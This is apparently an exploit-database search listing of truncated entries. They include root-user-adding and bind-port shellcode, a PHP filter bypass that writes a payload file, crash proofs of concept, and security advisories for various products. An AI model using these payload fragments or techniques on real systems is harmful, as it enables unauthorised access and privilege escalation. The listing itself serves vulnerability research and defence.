990 matches found
Linux x86_64 - add user with passwd 189 bytes
Linux x8664 - add user with passwd 189 bytes. Shellcode exploit for linx86-64 platform ;scadduser01.S ;Arch: x8664, Linux ; ;Author: 0o -- nullnull ; nu11.nu11 at yahoo.com ;Date: 2012-03-05 ; ;compile an executable: nasm -f elf64 scadduser.S ; ld -o scadduser scadduser.o ;compile an object: nasm...
Out-of-bounds
Google V8, as used in Google Chrome before 15.0.874.121, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger an out-of-bounds write operation...
SuperH sh4 Add root user with password
SuperH sh4 Add root user with password. Shellcode exploit for sh4 platform / Title: Linux/SuperH - sh4 - add root user with password - 143 bytes Date: 2011-06-23 Tested on: debian-sh4 2.6.32-5-sh7751r Author: Jonathan Salwan - twitter: @jonathansalwan http://shell-storm.org Informations:...
SuperH (sh4) Add root user with password
/ Title: Linux/SuperH - sh4 - add root user with password - 143 bytes Date: 2011-06-23 Tested on: debian-sh4 2.6.32-5-sh7751r Author: Jonathan Salwan - twitter: @shellstorm http://shell-storm.org Informations: ------------- - user: shell-storm - pswd: toor - uid : 0 open: mov 5, r3 mova @130, pc,...
dokuwiki -- multiple privilege escalation vulnerabilities
Dokuwiki reports: This security update fixes problems in the XMLRPC interface where ACLs where not checked correctly sometimes, making it possible to access and write information that should not have been accessible/writable. This only affects users who have enabled the XMLRPC interface default i...
Linux/ARM - add root user with password - 151 bytes
Linux/ARM - add root user with password - 151 bytes. Shellcode exploit for arm platform / Title: Linux/ARM - add root user with password - 151 bytes Date: 2010-11-25 Tested on: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan - twitter: @shellstorm http://shell-storm.org Informations: ------------- -...
WinTFTP Server Pro 3.1 - Directory Traversal
WinTFTP Server Pro 3.1 - Directory Traversal / / / / / // | / // \ | / / / / / /// / / / / / / / // / / / |/ / // / ,tftp Transfers files to and from a remote computer running the TFTP service. TFTP -i host GET | PUT source destination -i Specifies binary image transfer mode also called octet. In...
Write-to-file Shellcode Win32
Write-to-file Shellcode Win32. CVE-2010-0425. Shellcode exploits for multiple platform ; Write-to-file Shellcode ; ; This shellcode was used in the exploit for: CVE-2010-0425 ; Supported: Windows 2000, WinXP, Server 2003, Server 2008, Vista, Windows 7 ; ; Size: 278 bytes ;...
Linux write() & exit(0) shellcode genearator with customizable text
Exploit for generator platform in category shellcode =================================================================== Linux write & exit0 shellcode genearator with customizable text =================================================================== !/usr/bin/python Linux write & exit0 shellco...
DSEmu 0.4.10 - '.nds' Local Crash
!/usr/bin/env python DSEmu 0.4.10 .nds local crash Author: l3D Sites: http://xraysecurity.blogspot.com, http://nullbyte.org.il IRC: irc://irc.nix.co.il Email: [email protected] blah=open'crash.nds', 'w' blah.write'w00t'12 blah.close...
Debian DSA-1907-1 : kvm - several vulnerabilities
Several vulnerabilities have been discovered in kvm, a full virtualization system. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2008-5714 Chris Webb discovered an off-by-one bug limiting KVM's VNC passwords to 7 characters. This flaw might make it...
To bypass the <? PHP exit('Access Denied'); ?> Limit-vulnerability warning-the black bar safety net
To bypass ? PHP exit’Access Denied’; ?& gt; limit ? php $shellcode=’PD9waHBpbmZvKCk7Pz4’;// base64decode ? phpinfo;?& gt; $endstr=’s’; $timestamp=$endstr.$ shellcode; fileputcontents"php://filter/write=convert.base64-decode/resource=ryat.php","? PHP exit’Access Denied’; ?& gt;\t$timestamp"; ?& gt...
Sonique2 2.0 Beta Build 103 - Local Crash (PoC)
Sonique2 2.0 Beta Build 103 - Local Crash PoC !/usr/bin/python Title: Sonique2 2.0 Beta Build 103 Local Crash PoC Found by: b0telh0 Tested on: Windows XP SP3 crash = "\x41" 20000 try: file = open'b0t.pls','w'; file.writecrash; file.close; print "+ Created b0t.pls file." except: print "- Error can...
linux/x86 write(0 Hello core!\n"" 12)
No description provided by source. / writehello-core.c by Charles Stevenson [email protected] I made this as a chunk you can paste in to make modular remote exploits. I use it to see if my dup2loop worked. If you don't get "Hello core!\n" back it's a good indicator your shell won't be functional th...
Joomla Component com_oziogallery2 / IMAGIN arbitrary file write
Exploit for unknown platform in category web applications =============================================================== Joomla Component comoziogallery2 / IMAGIN arbitrary file write =============================================================== Exploit Title: Joomla component comoziogallery2 ...
Mandrake Security Advisory MDVSA-2009:244 (xfig)
The remote host is missing an update to xfig announced via advisory MDVSA-2009:244. OpenVAS Vulnerability Test $Id: mdksa2009244.nasl 6587 2017-07-07 06:35:35Z cfischer $ Description: Auto-generated from advisory MDVSA-2009:244 xfig Authors: Thomas Reinke Copyright: Copyright c 2009 E-Soft Inc...
linux/x86 bindport 8000 & add user with root access 225+ bytes
No description provided by source. ; ; Title : Bindport TCP/8000 & execve add user with access root ; os : Linux x86 ; size : 225+ bytes ; IP : localhost ; Port : 8000 ; Use : nc localhost 8000 ; ; Author : Jonathan Salwan ; Mail : submit AT shell-storm.org ; Web : http://www.shell-storm.org ; ; ...
php pear mail包任意文件读写漏洞
PEAR是PHP的官方开源类库, PHP Extension and Application Repository的缩写。PEAR将PHP程序开发过程中常用的功能编写成类库,涵盖了页面呈面、数据库访问、文件操作、数据结构、缓存操作、网络协议等许多方面,用户可以很方便地使用。它是一个PHP扩展及应用的一个代码仓库,简单地说,PEAR就是PHP的cpan。但是80sec发现,Pear 的Mail模块存在安全漏洞,某些情况下将导致用户以webserver权限在主机上读写操作系统任意文件,继而控制主机执行php代码等。...
iDefense COMRaider - ActiveX Control 'write()' Arbitrary File Overwrite
source: https://www.securityfocus.com/bid/33942/info iDefense COMRaider ActiveX control is prone to a vulnerability that lets attackers overwrite arbitrary local files on the victim's computer in the context of the vulnerable application using the ActiveX control typically Internet Explorer...
Apple Mac OSX xnu 1228.x - Local Kernel Memory Disclosure
/ xnu-getldt.c Copyright c 2008 by Apple MACOS X xnu include include include include include include include define TMPFILE "/tmp/xnu-getldt" define READSIZE 0x2000000 int main int argc, char argv int fd, n, numdesc; void ptr; printf "Apple MACOS X xnu \n" "http://www.digit-labs.org/ -- Digit-Lab...